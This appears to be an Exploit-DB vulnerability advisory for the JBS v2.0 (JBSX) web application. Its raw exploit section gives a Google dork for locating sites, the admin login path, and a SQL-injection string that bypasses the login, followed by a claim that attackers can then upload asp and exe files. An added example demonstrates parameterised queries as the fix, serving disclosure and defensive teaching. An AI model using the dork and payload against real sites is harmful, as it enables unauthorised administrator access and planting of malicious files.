Vendor: JBS v2.0 JBSX and other Jiro's Products
By: blackenedsecurity
CVSS: 8.3 (HIGH)
Title: Administration panel bypass and Malicious File Upload
CWE: 264
Product Name: JBS v2.0 JBSX and other Jiro's Products
Affected Version From: JBS v2.0 JBSX
Affected Version To: Other Jiro's Products
Patch Exists: Unknown
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Unknown

Administration panel bypass and Malicious File Upload Vulnerability

H4ckers may upload malicious files through the upload panel once they have administrator access. They can then change settings and upload asp and exe files.

Mitigation:

Ensure that the application is properly configured to prevent unauthorized access to the administration panel and malicious file uploads.
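
An added example, not code from the advisory or from the vendor: a Python and SQLite stand-in for the login check, showing how the field value listed in the raw data below changes the shape of a concatenated statement and why bound parameters leave it unchanged. The table, column names, credentials and the concatenation pattern itself are assumptions, since the page does not show the query inside login.asp.

```python
import sqlite3

# Constructed stand-in for the login check; the table, columns and credentials
# are assumptions, since the page does not show the query inside login.asp.
FIELD = "'or' '='"  # the string the page lists for both login fields

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'correct-horse')")
    return db

def concatenated_sql(user, pw):
    # Weak pattern: form fields are pasted between the quotes of the statement.
    return ("SELECT COUNT(*) FROM admins WHERE username = '" + user
            + "' AND password = '" + pw + "'")

def skeleton(sql):
    # Replace every '...' literal with ? ('' inside a literal is an escaped
    # quote) so that only the part parsed as SQL syntax remains visible.
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] != "'":
            out.append(sql[i])
            i += 1
            continue
        i += 1                          # skip the opening quote
        while i < n:
            if sql[i] == "'":
                if i + 1 < n and sql[i + 1] == "'":
                    i += 2              # escaped quote, still inside the literal
                    continue
                i += 1                  # closing quote
                break
            i += 1
        out.append(" ? ")
    return " ".join("".join(out).split())

def login_bound(db, user, pw):
    # Hardened pattern: values travel as bound parameters, never as SQL text.
    row = db.execute(
        "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?",
        (user, pw)).fetchone()
    return row[0] == 1
```

Classic ASP offers the same separation through ADODB.Command with parameters, which is the change a login page built on string concatenation needs.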

Exploit-DB raw data:

# Administration panel bypass and Malicious File Upload Vulnerability
# JBS v2.0 JBSX and other Jiro's Products
# Google Dork: "inurl:/files/redirect.asp"


Go to url files/login.asp

admin 'or' '='    
password 'or' '='

H4ckers may upload malicious files by using upload panel as they have administrator access.
They are able to change settings and upload asp and exe files.


# Bug discovered by blackenedsecurity
# http://blackenedsecurity.blogcu.com
# msn: syberhunter@hotmail.com
# From Turkey =)